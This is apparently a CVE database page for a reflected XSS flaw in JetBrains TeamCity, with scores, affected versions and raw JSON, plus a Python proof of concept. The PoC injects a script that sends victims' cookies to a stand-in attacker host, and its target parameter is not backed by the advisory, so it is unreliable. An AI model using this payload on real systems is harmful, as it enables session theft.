Security Vulnerability Report
中文
CVE-2025-68268 CVSS 5.4 MEDIUM

CVE-2025-68268

Published: 2025-12-16 16:16:07
Last Modified: 2025-12-18 19:11:57
Source: [email protected]

Description

In JetBrains TeamCity before 2025.11.1 reflected XSS was possible on the storage settings page

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:* - VULNERABLE
JetBrains TeamCity < 2025.11.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import urllib.parse # CVE-2025-68268 PoC - Reflected XSS in TeamCity Storage Settings Page # Target: JetBrains TeamCity < 2025.11.1 def generate_xss_payload(): """ Generate malicious URL with XSS payload for TeamCity storage settings page. This PoC demonstrates how an attacker can inject JavaScript code through URL parameters that are reflected without proper encoding. """ base_url = "http://target-server:8111/admin/admin.html" # XSS payload - will steal cookies when executed xss_payload = "<script>fetch('https://attacker-server/steal?cookie='+document.cookie)</script>" # URL encode the payload for injection encoded_payload = urllib.parse.quote(xss_payload) # Construct malicious URL targeting storage settings malicious_url = f"{base_url}?tab=storage&path={encoded_payload}" print("[*] CVE-2025-68268 PoC - Reflected XSS in TeamCity") print(f"[*] Target: {base_url}") print(f"[*] Malicious URL:\n{malicious_url}") print("\n[*] When victim visits this URL, the XSS payload will execute.") print("[*] The script will send victim's cookies to attacker-controlled server.") return malicious_url if __name__ == "__main__": generate_xss_payload()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68268", "sourceIdentifier": "[email protected]", "published": "2025-12-16T16:16:06.683", "lastModified": "2025-12-18T19:11:57.367", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In JetBrains TeamCity before 2025.11.1 reflected XSS was possible on the storage settings page"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.11.1", "matchCriteriaId": "549C8763-44C2-4416-9560-E83255B5C99F"}]}]}], "references": [{"url": "https://www.jetbrains.com/privacy-security/issues-fixed/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.